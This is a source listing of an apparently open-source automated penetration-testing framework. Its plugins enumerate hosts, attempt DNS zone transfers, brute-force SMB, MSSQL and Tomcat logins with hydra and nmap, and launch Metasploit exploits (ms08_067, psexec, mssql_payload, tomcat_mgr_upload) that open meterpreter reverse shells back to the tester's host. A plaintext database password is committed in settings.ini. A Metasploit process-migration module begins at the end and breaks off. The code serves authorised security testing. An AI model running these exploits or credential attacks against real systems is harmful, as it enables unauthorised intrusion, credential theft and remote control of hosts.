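        cursor.execute("select addWebsite(%s::int, %s::varchar, %s::text, %s::text)", (params.item_identifier, str(title), str(html), image_b64, ))
        cursor.close()
    except Exception:
        # NOTE(review): database and renderer failures end up here as well, not
        # only undecodable page content
        print("service is hosting unreadable content")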
71 |
72 | #image = None
73 | #try:
74 | # with open(filename, 'r') as f:
75 | # image = f.read()
76 | #except:
77 | # pass
78 |
79 | #cursor = params.db.cursor()
80 | #cursor.execute("select addWebsite(%s, %s, %s, %s)", (params.item_identifier, title, html, psycopg2.Binary(image), ))
81 | #cursor.close()
82 |
--------------------------------------------------------------------------------
/plugins/host_enumeration/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sensepost/autoDANE/50153da2521c78bb11e8bcf95930614abaf55e5f/plugins/host_enumeration/__init__.py
--------------------------------------------------------------------------------
/plugins/host_enumeration/add_local_ip.py:
--------------------------------------------------------------------------------
1 | import os
2 |
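def run(params):
    """Look up the address of ``params.networkInterface`` and add it as a host.

    Runs ``ifconfig <interface>`` and takes, from every line that contains
    "inet addr", the text between the first colon and the next space.  Nothing
    is stored when no such line is found.
    """
    import subprocess  # local import: the file header only brings in os

    #TODO: get interface from the "Advanced Options" tab you're going to add
    interface = str(params.networkInterface)
    if interface.startswith("-"):
        raise ValueError("interface name looks like a command-line option: {0!r}".format(interface))

    # the interface name is one argv entry; no shell pipeline is involved
    output = subprocess.Popen(["ifconfig", interface], stdout=subprocess.PIPE).communicate()[0]

    # NOTE(review): ifconfig builds that print "inet 192.0.2.1" (sample value)
    # without "addr:" produce no match here
    found = []
    for line in output.split("\n"):
        if "inet addr" not in line:
            continue
        pieces = line.split(":")
        after_colon = pieces[1] if len(pieces) > 1 else line
        found.append(after_colon.split(" ")[0])
    ip_address = "\n".join(found)

    params.log("local ip address {0}. adding to db".format(ip_address))
    if not ip_address:
        # an empty address would otherwise be stored as a host
        params.log("no address found for interface {0}; nothing added".format(interface))
        return

    cursor = params.db.cursor()
    cursor.execute("select addHost(%s, %s::varchar, ''::varchar, false)", (params.footprint_id, ip_address, ))
    cursor.close()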
12 |
--------------------------------------------------------------------------------
/plugins/host_enumeration/add_local_nameservers.py:
--------------------------------------------------------------------------------
1 | import os
2 |
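def _resolv_conf_values(keyword):
    """Return the second field of each /etc/resolv.conf line whose first field is keyword."""
    values = []
    with open("/etc/resolv.conf") as handle:
        for line in handle:
            fields = line.split()
            if len(fields) > 1 and fields[0] == keyword:
                values.append(fields[1])
    return values


def run(params):
    """Add the local resolver's search-domain hosts and nameservers as hosts.

    First the search domain from /etc/resolv.conf is resolved with ``host`` and
    every IPv4 address it returns is stored with ``addHost``.  Then every
    ``nameserver`` entry that does not start with "127" is stored as well.
    Both steps are best effort: a failure is logged and the plugin carries on.
    """
    import subprocess  # local import: the file header only brings in os

    def add_host(ip_address):
        cursor = params.db.cursor()
        cursor.execute("select addHost(%s, %s::varchar, ''::varchar, false)", (params.footprint_id, ip_address, ))
        cursor.close()

    try:
        for domain in _resolv_conf_values("search"):
            # resolv.conf may be written from DHCP data, so the domain is one
            # argv entry and is refused when it is shaped like an option
            if domain.startswith("-"):
                continue
            params.log("host {0}".format(domain))
            params.log("")
            output = subprocess.Popen(["host", domain], stdout=subprocess.PIPE).communicate()[0]
            for line in output.split("\n"):
                fields = line.split(" ")
                # on "has IPv6 address" lines the fourth field is the word
                # "address", which the old pipeline stored as a host
                if "address" in line and "IPv6" not in line and len(fields) > 3 and fields[3] != "":
                    add_host(fields[3])
    except Exception as error:
        params.log("search domain lookup failed: {0}".format(error))

    try:
        params.log("nameserver entries from /etc/resolv.conf")
        params.log("")
        for ip_address in _resolv_conf_values("nameserver"):
            # loopback resolvers are not part of the target network
            if ip_address[:3] != "127":
                add_host(ip_address)
    except Exception as error:
        params.log("nameserver lookup failed: {0}".format(error))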
32 |
33 | # try:
34 | # cmd = "cat /etc/resolv.conf | grep search | cut -d \ -f 2"
35 | # params.log(cmd)
36 | # params.log("")
37 | # resolver = os.popen(cmd).read()[:-1]
38 | # params.log(resolver)
39 | # params.log("")
40 | #
41 | # cmd = "host {0} | grep address | cut -d \ -f 4".format(resolver)
42 | # params.log(cmd)
43 | # params.log("")
44 | # resolvers = os.popen(cmd).read()[:-1].split("\n")
45 | # params.log(resolvers)
46 | # params.log("")
47 | #
48 | # for r in resolvers:
49 | # cursor = params.db.cursor()
50 | # cursor.execute("call addHost(%s, %s, '', 1)", (params.footprint_id, r, ))
51 | # cursor.close()
52 | # except:
53 | # pass
54 |
--------------------------------------------------------------------------------
/plugins/host_enumeration/zone_transfer_assigned_domain.py:
--------------------------------------------------------------------------------
1 | import os
2 | import random
3 | import string
4 |
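def _host_addresses(name):
    """Return the IPv4 addresses that ``host name`` prints (4th field of "address" lines).

    The name is passed as a single argv entry; an empty name or one shaped like
    a command-line option yields an empty list.
    """
    import subprocess  # local import: the file header only brings in os/random/string

    if not name or name.startswith("-"):
        return []
    output = subprocess.Popen(["host", name], stdout=subprocess.PIPE).communicate()[0]
    addresses = []
    for line in output.split("\n"):
        fields = line.split(" ")
        # on "has IPv6 address" lines the fourth field is the word "address"
        if "address" in line and "IPv6" not in line and len(fields) > 3 and fields[3] != "":
            addresses.append(fields[3])
    return addresses


def run(params):
    """Request a zone transfer for each local search domain and store the hosts found.

    The search domain is read from /etc/resolv.conf.  ``dig axfr`` is run once
    per address that ``host <domain>`` returns, with its output collected in
    ``temp/<random name>``.  A, NS, CNAME and MX records in that file are stored
    with ``addHost``; names are resolved with ``host`` first.  The file is
    logged afterwards.
    """
    import subprocess  # local import: the file header only brings in os/random/string

    def add_host(ip_addr, host_name):
        cursor = params.db.cursor()
        cursor.execute("select addHost(%s, %s::varchar, %s::varchar, false)", (params.footprint_id, ip_addr, host_name, ))
        cursor.close()

    domains = []
    with open("/etc/resolv.conf") as handle:
        for line in handle:
            if "search" in line:
                fields = line.rstrip("\n").split(" ")
                domains.append(fields[1] if len(fields) > 1 else fields[0])

    for domain in domains:
        # resolv.conf may be written from DHCP data: skip option-shaped values
        if domain == "" or domain.startswith("-"):
            continue
        print("found domain [{}]".format(domain))
        temp_file_name = ''.join(random.SystemRandom().choice(string.ascii_uppercase + string.digits) for _ in range(6))
        output_path = "temp/{}".format(temp_file_name)

        with open(output_path, "w") as out:
            for server in sorted(set(_host_addresses(domain))):
                subprocess.call(["timeout", "2", "dig", "axfr", domain, server], stdout=out)

        with open(output_path) as handle:
            records = handle.readlines()

        # Everything below is parsed from DNS answers, i.e. untrusted network
        # data: names only reach `host` as single argv entries and the database
        # as bound parameters.
        for record in records:
            record = record[:-1]
            if record.find("\tA\t") > -1:
                add_host(record.split("\t")[-1], "")
                continue
            if record.find("\tNS\t") > -1:
                host_name = record.split("\t")[-1][:-1]  # drop the trailing dot
            elif record.find("CNAME") > -1:
                host_name = record.split("CNAME")[1].strip()[:-1]
            elif record.find("\tMX\t") > -1:
                host_name = record.split("MX")[1].strip()[:-1].split(" ")[1]
            else:
                continue
            # one row per address; the old pipeline stored several answers as
            # one multi-line value and an unresolved name as an empty address
            for ip_addr in _host_addresses(host_name):
                add_host(ip_addr, host_name)

        params.log("".join(records))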
68 |
69 |
--------------------------------------------------------------------------------
/plugins/pivoting/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sensepost/autoDANE/50153da2521c78bb11e8bcf95930614abaf55e5f/plugins/pivoting/__init__.py
--------------------------------------------------------------------------------
/plugins/pivoting/psexec_local_account.py:
--------------------------------------------------------------------------------
1 | from msf import exploit
2 | import base64
3 |
def run(params):
    """Run the psexec console module against a host using a stored local credential.

    The host address and credential are read for ``params.item_identifier``, a
    console command list is handed to ``exploit.runMsf`` and the collected
    output is stored base64-encoded in ``exploit_logs``.
    """
    query = "select hd.ip_address, lc.username, lc.cleartext_password, hd.id from host_data hd join local_credentials lc on hd.id = lc.host_data_id where lc.id = %s and lc.cleartext_password != ''"
    db_cursor = params.db.cursor()
    db_cursor.execute(query, (params.item_identifier, ))
    # NOTE(review): fetchone() gives None when no row matches; the indexing
    # below does not guard against that
    record = db_cursor.fetchone()
    db_cursor.close()

    # NOTE(review): username and password are formatted into console commands
    # unescaped and the password is handled in cleartext throughout
    console_commands = [
        "use exploit/windows/smb/psexec",
        "set PAYLOAD windows/meterpreter/reverse_tcp",
        "set RHOST {0}".format(record[0]),
        "set LHOST {0}".format(params.getLocalHost()),
        "set LPORT {0}".format(params.getOpenPort()),
        "set smbuser {0}".format(record[1]),
        "set smbpass {0}".format(record[2]),
        "exploit"
    ]

    # NOTE(review): the vuln_exploits plugins treat runMsf()'s return value as
    # a (success, lines) pair, while this loop iterates it directly - confirm
    # which shape is returned
    chunks = []
    for entry in exploit.runMsf(params, record[3], console_commands, "psexec"):
        chunks.append(entry + "\r\n")
        params.log(entry)

    db_cursor = params.db.cursor()
    db_cursor.execute("insert into exploit_logs (host_data_id, vulnerability_description_id, log) values(%s, %s, %s)", (record[3], 4, base64.b64encode("".join(chunks)), ))
    db_cursor.close()
32 |
--------------------------------------------------------------------------------
/plugins/pivoting/retry_domain_accounts.py:
--------------------------------------------------------------------------------
1 | import os
2 | import base64
3 |
4 |
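def run(params):
    """Try one stored domain credential against one host and record the outcome.

    ``getdomaincredstoretry`` supplies the host and credential.  A task-list
    item (type 16) is created, ``smbexec.py`` is run with "exit" on its
    standard input and its output written to ``temp/<random name>``; the
    credential is recorded as valid when exactly one output line contains
    "semi-interactive".  The queued log lines are then stored base64-encoded
    with ``updateTaskStatus``.  Nothing happens when no credential is returned.
    """
    import subprocess  # local import: the file header only brings in os/base64

    sql = """
    SELECT
        (f).host_data_id,
        (f).ip_address,
        (f).domain_creds_id,
        (f).domain,
        (f).username,
        (f).cleartext_password
    FROM (select getdomaincredstoretry(%s) AS f) x;
    """

    cursor = params.db.cursor()
    cursor.execute(sql, (params.footprint_id, ))
    row = cursor.fetchone()
    cursor.close()

    if row is None:
        return

    cursor = params.db.cursor()
    cursor.execute("select addTaskListItem(%s, 16, %s, true, false)",
                   (params.footprint_id, row[2], ))
    task_id = cursor.fetchone()[0]
    cursor.close()

    host_id = row[0]
    ip_address = row[1]
    domain_creds_id = row[2]
    domain = row[3]
    username = row[4]
    cleartext_password = row[5]

    # The credential is one argv entry, so no character in the password needs
    # shell escaping and none can change the command that is run.
    # NOTE(review): the password is still visible in the process list and is
    # written to the task log in cleartext.
    target = "{0}/{1}:{2}@{3}".format(domain, username, cleartext_password, ip_address)
    argv = ["timeout", "10", "smbexec.py", target, "445/SMB"]
    output_file_name = "temp/" + params.getRandomFileName()
    params.log("echo exit | " + " ".join(argv))
    params.log("")
    with open(output_file_name, "w") as out:
        proc = subprocess.Popen(argv, stdin=subprocess.PIPE, stdout=out)
        proc.communicate(b"exit\n")

    with open(output_file_name) as handle:
        output = handle.read()
    params.log(output)
    # number of output lines mentioning the shell banner, as text
    res = str(sum(1 for line in output.split("\n") if "semi-interactive" in line))

    # NOTE(review): this tests the match count, not the tool output, so the
    # condition is always true - kept as found
    if res.find("STATUS_OBJECT_NAME_NOT_FOUND") == -1:
        cursorb = params.db.cursor()
        cursorb.execute("select addToDomainCredentialsMap(%s, %s, %s, %s)", (params.footprint_id, host_id, domain_creds_id, int(res) == 1, ))
        cursorb.close()
    # else do the job again.

    queued = []
    while not params.log_queue.empty():
        queued.append("{0}".format(params.log_queue.get(False)))
    final_output = "\r\n".join(queued)

    spCursor = params.db.cursor()
    spCursor.execute("select updateTaskStatus(%s, %s, %s, %s)", (task_id, False, True, base64.b64encode(final_output), ))
    spCursor.close()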
68 |
--------------------------------------------------------------------------------
/plugins/pivoting/retry_local_accounts.py:
--------------------------------------------------------------------------------
1 | import os
2 |
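def run(params):
    """Try one untested local credential against one host with SMB open.

    The query picks a host/credential pair that has not been tried before,
    ``hydra`` checks it, and the result is stored with
    ``addToLocalCredentialsMap``.  Nothing happens when the query returns no row.
    """
    import subprocess  # local import: the file header only brings in os

    # NOTE(review): the statement is kept as found.  Its "#" lines are not
    # comments in PostgreSQL, the first sub-select filters on footprint_id = 1
    # while the second uses the parameter, and the result is stored with
    # "call" where sibling plugins use "select" - confirm against the database
    # this plugin is meant to run on.
    sql = """
    select
        hd.id,
        lc.id,
        hd.ip_address,
        lc.username,
        lc.cleartext_password
    from
        host_data hd,
        port_data pd,
        local_credentials lc
    where
        hd.id = pd.host_data_id and
        pd.port_number = 445 and
        lc.cleartext_password != '' and
        #exclude credentials that have been tried prviously
        (hd.ip_address, lc.username, lc.cleartext_password) not in (select hd.ip_address, lc.username, lc.cleartext_password from host_data hd join port_data pd on hd.id = pd.host_data_id join local_credentials_map m on hd.id = m.host_data_id join local_credentials lc on lc.id = m.local_credentials_id where hd.footprint_id = 1 and pd.port_number = 445) and
        #exclude hosts that have valid creds with the same username, regardless of the password
        (hd.ip_address, lc.username) not in (select hd.ip_address, lc.username from host_data hd join port_data pd on hd.id = pd.host_data_id join local_credentials_map m on hd.id = m.host_data_id join local_credentials lc on lc.id = m.local_credentials_id where hd.footprint_id = %s and pd.port_number = 445 and m.valid = 1)"""

    cursor = params.db.cursor()
    cursor.execute(sql, (params.footprint_id, ))

    row = cursor.fetchone()
    cursor.close()

    if row is None:
        return

    #TODO: modify to be the same as the domain accounts plugin

    # Address, username and password are separate argv entries, so no
    # character in them needs shell escaping or can change the command run.
    # NOTE(review): the password is still visible in the process list and is
    # written to the log in cleartext.
    argv = ["hydra", "-l", "{0}".format(row[3]), "-p", "{0}".format(row[4]), "{0}".format(row[2]), "smb"]
    params.log(" ".join(argv))
    params.log("")
    output = subprocess.Popen(argv, stdout=subprocess.PIPE).communicate()[0]
    # number of output lines reporting a hit, as text
    res = str(sum(1 for line in output.split("\n") if "1 valid password found" in line))
    params.log(res)

    cursorb = params.db.cursor()
    cursorb.execute("call addToLocalCredentialsMap(%s, %s, %s)", (row[0], row[1], (res == "1"), ))
    cursorb.close()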
50 | #else:
51 | #print "no creds to check"
52 | # params.log("no creds to check")
53 |
--------------------------------------------------------------------------------
/plugins/pivoting/verify_domain_credentials.py:
--------------------------------------------------------------------------------
1 | import os
2 | import time
3 | import base64
4 |
5 |
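def run(params):
    """Check one stored domain credential and record whether it is valid.

    ``getdomaincredstoverify`` supplies the credential, the host to test
    against and the task id.  ``hydra`` output is written to
    ``temp/<random name>``; the credential is marked verified when exactly one
    output line contains "1 valid password found".  The queued log lines are
    then stored base64-encoded with ``updateTaskStatus``.  Nothing happens when
    no credential is returned.
    """
    import subprocess  # local import: the file header only brings in os/time/base64

    sql = """SELECT
    (f).domain_credentials_id,
    (f).ip_address,
    (f).domain,
    (f).username,
    (f).cleartext_password,
    (f).host_data_id,
    (f).task_list_id
    FROM (select getdomaincredstoverify(%s) AS f) x;"""

    cursor = params.db.cursor()
    cursor.execute(sql, (params.footprint_id, ))
    # TODO: this lists all the dcs that could be used
    # change the script to check if a host is inaccessible, and use a
    # different one if so
    row = cursor.fetchone()
    cursor.close()

    if row is None:
        return

    domain_creds_id = row[0]
    ip_address = row[1]
    domain = row[2]
    username = row[3]
    cleartext_password = row[4]
    task_id = row[6]

    # Every database value is its own argv entry, so no character in the
    # password needs shell escaping or can change the command that is run.
    # NOTE(review): the password is still visible in the process list and is
    # written to the task log in cleartext.
    argv = ["hydra", "-l", "{0}@{1}".format(username, domain), "-p", "{0}".format(cleartext_password), "{0}".format(ip_address), "smb", "-t", "1"]
    output_file_name = "temp/" + params.getRandomFileName()
    params.log(" ".join(argv))
    params.log("")
    with open(output_file_name, "w") as out:
        subprocess.call(argv, stdout=out)

    with open(output_file_name) as handle:
        output = handle.read()
    params.log(output)
    # number of output lines reporting a hit, as text
    res = str(sum(1 for line in output.split("\n") if "1 valid password found" in line))

    cursorb = params.db.cursor()
    cursorb.execute("select setDomainCredsVerified(%s, %s, %s)",
                    (params.footprint_id, domain_creds_id, (res == "1"), ))
    cursorb.close()

    queued = []
    while params.log_queue.empty() is False:
        queued.append("{0}".format(params.log_queue.get(False)))
    final_output = "\r\n".join(queued)

    spCursor = params.db.cursor()
    spCursor.execute("select updateTaskStatus(%s, %s, %s, %s)",
                     (task_id, False, True, base64.b64encode(final_output), ))
    spCursor.close()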
60 |
--------------------------------------------------------------------------------
/plugins/vuln_exploits/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sensepost/autoDANE/50153da2521c78bb11e8bcf95930614abaf55e5f/plugins/vuln_exploits/__init__.py
--------------------------------------------------------------------------------
/plugins/vuln_exploits/exploit_ms08_067.py:
--------------------------------------------------------------------------------
1 | from msf import exploit
2 | import base64
3 |
def run(params):
    """Run the ms08_067 console module against the host behind a stored vulnerability.

    Host data is read for ``params.item_identifier``, a console command list is
    handed to ``exploit.runMsf``, the host is flagged when the first element of
    the result equals True, and the output is stored base64-encoded in
    ``exploit_logs``.
    """
    query = "select hd.id, hd.ip_address, pd.port_number, v.details from host_data hd join port_data pd on hd.id = pd.host_data_id join vulnerabilities v on v.port_data_id = pd.id where v.id = %s"
    db_cursor = params.db.cursor()
    db_cursor.execute(query, (params.item_identifier, ))
    # NOTE(review): fetchone() gives None when no row matches; the indexing
    # below does not guard against that
    record = db_cursor.fetchone()
    db_cursor.close()

    console_commands = [
        "use exploit/windows/smb/ms08_067_netapi",
        "set PAYLOAD windows/meterpreter/reverse_tcp",
        "set RHOST {0}".format(record[1]),
        "set LHOST {0}".format(params.getLocalHost()),
        "set LPORT {0}".format(params.getOpenPort()),
        "exploit"
    ]

    # runMsf's result is used as a pair: [0] success flag, [1] output lines
    outcome = exploit.runMsf(params, record[0], console_commands, "ms08_067")
    chunks = []
    for entry in outcome[1]:
        chunks.append(entry + "\r\n")
        params.log(entry)

    if outcome[0] == True:
        db_cursor = params.db.cursor()
        db_cursor.execute("update host_data set successful_info_gather = true where id = %s", (record[0], ))
        db_cursor.close()

    db_cursor = params.db.cursor()
    db_cursor.execute("insert into exploit_logs (host_data_id, vulnerability_description_id, log) values(%s, %s, %s)", (record[0], 1, base64.b64encode("".join(chunks)), ))
    db_cursor.close()
36 |
--------------------------------------------------------------------------------
/plugins/vuln_exploits/exploit_weak_sql_creds.py:
--------------------------------------------------------------------------------
1 | from msf import exploit
2 | import base64
3 |
def run(params):
    """Run the mssql_payload console module using credentials stored with a vulnerability.

    Host data and the "user:password" details are read for
    ``params.item_identifier``, a console command list is handed to
    ``exploit.runMsf``, the host is flagged when the first element of the
    result equals True, and the output is stored base64-encoded in
    ``exploit_logs``.
    """
    query = "select hd.id, hd.ip_address, pd.port_number, v.details from host_data hd join port_data pd on hd.id = pd.host_data_id join vulnerabilities v on v.port_data_id = pd.id where v.id = %s"
    db_cursor = params.db.cursor()
    db_cursor.execute(query, (params.item_identifier, ))
    # NOTE(review): fetchone() gives None when no row matches; the indexing
    # below does not guard against that
    record = db_cursor.fetchone()
    db_cursor.close()

    # NOTE(review): only the first two ":"-separated fields are used, so a
    # password containing ":" is cut short - confirm how details is written
    user_and_password = record[3].split(":")

    console_commands = [
        "use exploit/windows/mssql/mssql_payload",
        "set PAYLOAD windows/meterpreter/reverse_tcp",
        "set RHOST {0}".format(record[1]),
        "set LHOST {0}".format(params.getLocalHost()),
        "set LPORT {0}".format(params.getOpenPort()),
        "set username {0}".format(user_and_password[0]),
        "set password {0}".format(user_and_password[1]),
        "exploit"
    ]

    # runMsf's result is used as a pair: [0] success flag, [1] output lines
    outcome = exploit.runMsf(params, record[0], console_commands, "sql_creds")
    chunks = []
    for entry in outcome[1]:
        chunks.append(entry + "\r\n")
        params.log(entry)

    if outcome[0] == True:
        db_cursor = params.db.cursor()
        db_cursor.execute("update host_data set successful_info_gather = true where id = %s", (record[0], ))
        db_cursor.close()

    db_cursor = params.db.cursor()
    db_cursor.execute("insert into exploit_logs (host_data_id, vulnerability_description_id, log) values(%s, %s, %s)", (record[0], 2, base64.b64encode("".join(chunks)), ))
    db_cursor.close()
40 |
--------------------------------------------------------------------------------
/plugins/vuln_exploits/exploit_weak_tomcat_creds.py:
--------------------------------------------------------------------------------
1 | from msf import exploit
2 | import base64
3 |
def run(params):
    """Run the Metasploit Tomcat manager upload module for one stored finding.

    The vulnerability row selected by ``params.item_identifier`` supplies the
    host id, address, port and the ``user:password`` pair kept in the
    ``details`` column. Every line returned by ``exploit.runMsf`` is passed to
    ``params.log`` and the joined output is stored base64-encoded in
    ``exploit_logs`` with vulnerability_description_id 3. The host row is
    flagged in ``host_data`` only when the first element of the result is True.

    NOTE(review): the page lost the file's indentation; the ``exploit_logs``
    insert is placed outside the success branch here -- confirm against the
    original file.
    """
    sql = "select hd.id, hd.ip_address, pd.port_number, v.details from host_data hd join port_data pd on hd.id = pd.host_data_id join vulnerabilities v on v.port_data_id = pd.id where v.id = %s"
    lookup = params.db.cursor()
    lookup.execute(sql, (params.item_identifier, ))
    row = lookup.fetchone()
    lookup.close()

    # The details column is read as "user:password".
    creds = row[3].split(":")

    # Console commands are appended in the order the console receives them.
    setup = [
        "use exploit/multi/http/tomcat_mgr_upload",
        "set TARGET 1",
        "set PAYLOAD windows/meterpreter/reverse_tcp",
    ]
    setup.append("set RHOST {0}".format(row[1]))
    setup.append("set RPORT {0}".format(row[2]))
    setup.append("set LHOST {0}".format(params.getLocalHost()))
    setup.append("set LPORT {0}".format(params.getOpenPort()))
    setup.append("set username {0}".format(creds[0]))
    setup.append("set password {0}".format(creds[1]))
    setup.append("exploit")

    result = exploit.runMsf(params, row[0], setup, "tomcat_creds")

    # Forward each output line to the UI log while collecting the transcript.
    transcript = []
    for line in result[1]:
        transcript.append(line + "\r\n")
        params.log(line)
    log = "".join(transcript)

    if result[0] == True:
        flag_cursor = params.db.cursor()
        flag_cursor.execute("update host_data set successful_info_gather = true where id = %s", (row[0], ))
        flag_cursor.close()

    log_cursor = params.db.cursor()
    log_cursor.execute("insert into exploit_logs (host_data_id, vulnerability_description_id, log) values(%s, %s, %s)", (row[0], 3, base64.b64encode(log), ))
    log_cursor.close()
42 |
--------------------------------------------------------------------------------
/plugins/vuln_scanning/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sensepost/autoDANE/50153da2521c78bb11e8bcf95930614abaf55e5f/plugins/vuln_scanning/__init__.py
--------------------------------------------------------------------------------
/plugins/vuln_scanning/ms08_067.py:
--------------------------------------------------------------------------------
1 | import os
2 |
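def run(params):
    """Check one recorded port for MS08-067 with the bundled NSE script.

    Looks up the host address and port for ``params.item_identifier``, runs
    nmap with ``software/ms08-067_check/ms08-067.nse`` and, when the output
    contains "MS08-067: VULNERABLE" or "MS08-067: LIKELY VULNERABLE", records
    the finding through the ``addVulnerability`` database function with
    vulnerability id 1.

    Args:
        params: plugin context; this function reads ``db``,
            ``item_identifier``, ``footprint_id`` and ``nmapTiming`` and
            calls ``getRandomFileName()`` and ``log()``.
    """
    # Local import: the file's own import block only provides ``os``.
    import subprocess

    cursor = params.db.cursor()
    cursor.execute("select hd.ip_address, pd.id, pd.port_number from host_data hd join port_data pd on hd.id = pd.host_data_id where pd.id = %s", (params.item_identifier, ))
    row = cursor.fetchone()
    cursor.close()

    # No matching port row: nothing to scan.
    if row is None:
        return

    output_file_name = "temp/" + params.getRandomFileName()

    # Values read from the database are passed as separate arguments, so they
    # are never interpreted by a shell (the previous version formatted them
    # into a command string for os.popen).
    # NOTE: the bundled script's own description says this check can crash
    # the service on a vulnerable host.
    argv = [
        "nmap", str(row[0]), "-n",
        "-p", str(row[2]),
        "-Pn",
        "--script", "software/ms08-067_check/ms08-067.nse",
        "-T", str(params.nmapTiming),
    ]
    params.log(" ".join(argv))

    # subprocess.call waits for nmap to finish before the output is read.
    with open(output_file_name, "w") as output_file:
        try:
            subprocess.call(argv, stdout=output_file)
        except OSError as exc:
            # Keep the plugin best-effort when nmap cannot be started.
            params.log("nmap could not be started: {0}".format(exc))

    with open(output_file_name) as output_file:
        output = output_file.read()
    params.log(output)

    markers = ("MS08-067: LIKELY VULNERABLE", "MS08-067: VULNERABLE")
    if any(marker in output for marker in markers):
        cursor = params.db.cursor()
        cursor.execute("select addVulnerability(%s, %s, %s, %s::varchar)", (params.footprint_id, row[1], 1, "", ))
        cursor.close()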
24 |
--------------------------------------------------------------------------------
/plugins/vuln_scanning/weak_sql_creds.py:
--------------------------------------------------------------------------------
1 | import os
2 |
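def run(params):
    """Run nmap's ms-sql-brute script against one recorded port.

    Looks up the host address and port for ``params.item_identifier``, runs
    nmap with the user and password lists under ``creds/`` and, when the
    output contains a "Login Success" line, records the text before the first
    "=" of that output through the ``addVulnerability`` database function with
    vulnerability id 2.

    Args:
        params: plugin context; this function reads ``db``,
            ``item_identifier``, ``footprint_id`` and ``nmapTiming`` and
            calls ``getRandomFileName()`` and ``log()``.
    """
    # Local import: the file's own import block only provides ``os``.
    import subprocess

    cursor = params.db.cursor()
    cursor.execute("select hd.ip_address, pd.id, pd.port_number from host_data hd join port_data pd on hd.id = pd.host_data_id where pd.id = %s", (params.item_identifier, ))
    row = cursor.fetchone()
    cursor.close()

    # No matching port row: nothing to scan.
    if row is None:
        return

    output_file_name = "temp/" + params.getRandomFileName()

    # Values read from the database are passed as separate arguments, so they
    # are never interpreted by a shell (the previous version formatted them
    # into a command string for os.popen).
    argv = [
        "nmap", "-n",
        "-p", str(row[2]),
        "-Pn",
        "--script", "ms-sql-brute",
        "--script-args", "mssql.instance-all,userdb=creds/mssql_users,passdb=creds/mssql_passes",
        str(row[0]),
        "-T", str(params.nmapTiming),
    ]
    params.log(" ".join(argv))

    # subprocess.call waits for nmap to finish before the output is read.
    with open(output_file_name, "w") as output_file:
        try:
            subprocess.call(argv, stdout=output_file)
        except OSError as exc:
            # Keep the plugin best-effort when nmap cannot be started.
            params.log("nmap could not be started: {0}".format(exc))

    with open(output_file_name) as output_file:
        output = output_file.read()
    params.log(output)

    # Same text the former `grep "Login Success"` produced: every matching
    # line, each terminated by a newline.
    res = "".join(line + "\n" for line in output.split("\n") if "Login Success" in line)

    if len(res) > 2:
        # Drop the two leading output-decoration characters and the final
        # newline, then keep what precedes the first "=".
        creds = res[2:-1].split("=")[0].strip()

        cursor = params.db.cursor()
        cursor.execute("select addVulnerability(%s, %s, %s, %s::varchar)", (params.footprint_id, row[1], 2, creds, ))
        cursor.close()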
26 |
--------------------------------------------------------------------------------
/plugins/vuln_scanning/weak_tomcat_creds.py:
--------------------------------------------------------------------------------
1 | import os
2 |
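def run(params):
    """Run the bundled tomcat-scan NSE script against one recorded port.

    Looks up the host address and port for ``params.item_identifier``, runs
    nmap with ``software/tomcat_check/tomcat-scan.nse`` and, when the output
    contains a "Found combination" line, records the fourth space-separated
    field of that output through the ``addVulnerability`` database function
    with vulnerability id 3.

    Args:
        params: plugin context; this function reads ``db``,
            ``item_identifier``, ``footprint_id`` and ``nmapTiming`` and
            calls ``getRandomFileName()`` and ``log()``.
    """
    # Local import: the file's own import block only provides ``os``.
    import subprocess

    cursor = params.db.cursor()
    cursor.execute("select hd.ip_address, pd.id, pd.port_number from host_data hd join port_data pd on hd.id = pd.host_data_id where pd.id = %s", (params.item_identifier, ))
    row = cursor.fetchone()
    cursor.close()

    # No matching port row: nothing to scan.
    if row is None:
        return

    output_file_name = "temp/" + params.getRandomFileName()

    # Values read from the database are passed as separate arguments, so they
    # are never interpreted by a shell (the previous version formatted them
    # into a command string for os.popen).
    argv = [
        "nmap", str(row[0]),
        "-p", str(row[2]),
        "-Pn",
        "--script", "software/tomcat_check/tomcat-scan.nse",
        "-T", str(params.nmapTiming),
    ]
    params.log(" ".join(argv))

    # subprocess.call waits for nmap to finish before the output is read.
    with open(output_file_name, "w") as output_file:
        try:
            subprocess.call(argv, stdout=output_file)
        except OSError as exc:
            # Keep the plugin best-effort when nmap cannot be started.
            params.log("nmap could not be started: {0}".format(exc))

    with open(output_file_name) as output_file:
        output = output_file.read()
    params.log(output)

    # Same text the former grep pipeline produced: every line containing
    # "Found combination", each terminated by a newline.
    res = "".join(line + "\n" for line in output.split("\n") if "Found combination" in line)

    if len(res) > 3:
        # Fourth space-separated field of the matched output, as before.
        creds = res[:-1].split(" ")[3]

        cursor = params.db.cursor()
        cursor.execute("select addVulnerability(%s, %s, %s, %s::varchar)", (params.footprint_id, row[1], 3, creds, ))
        cursor.close()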
27 |
--------------------------------------------------------------------------------
/settings.ini:
--------------------------------------------------------------------------------
; NOTE(review): the PostgreSQL password below is committed in plaintext.
; Treat the value as exposed: rotate it, and load it from an untracked file
; or the environment instead of the repository.
1 | [postgres]
2 | host=localhost
3 | user=autodane
4 | pass=OHZdz7CW8Lv4PCa
5 | db=autodane
6 |
--------------------------------------------------------------------------------
/software/.adsmbexec.py.swp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sensepost/autoDANE/50153da2521c78bb11e8bcf95930614abaf55e5f/software/.adsmbexec.py.swp
--------------------------------------------------------------------------------
/software/metasploit/modules/post/windows/manage/sp_smart_migrate.rb:
--------------------------------------------------------------------------------
1 | ##
2 | # This module requires Metasploit: http://metasploit.com/download
3 | # Current source: https://github.com/rapid7/metasploit-framework
4 | ##
5 |
6 | require 'msf/core'
7 | require 'rex'
8 |
class Metasploit3 < Msf::Post

  # Registers the module metadata with the framework.
  #
  # NOTE: the description text lists explorer.exe first and winlogon.exe as
  # the fallback, while #run below tries winlogon.exe first.
  def initialize(info={})
    module_info = {
      'Name'          => 'Slightly modified Windows Manage Smart Process Migration',
      'Description'   => %q{ This module will migrate a Meterpreter session.
It will first attempt to migrate to explorer.exe for the current user. Failing that,
it will attempt any other explorer.exe processes. Finally it will fall back to winlogon.exe},
      'License'       => MSF_LICENSE,
      'Author'        => [ 'thelightcosine'],
      'Platform'      => [ 'win' ],
      'SessionTypes'  => [ 'meterpreter' ]
    }
    super(update_info(info, module_info))
  end

  # Groups the session's process list into three candidate sets and tries
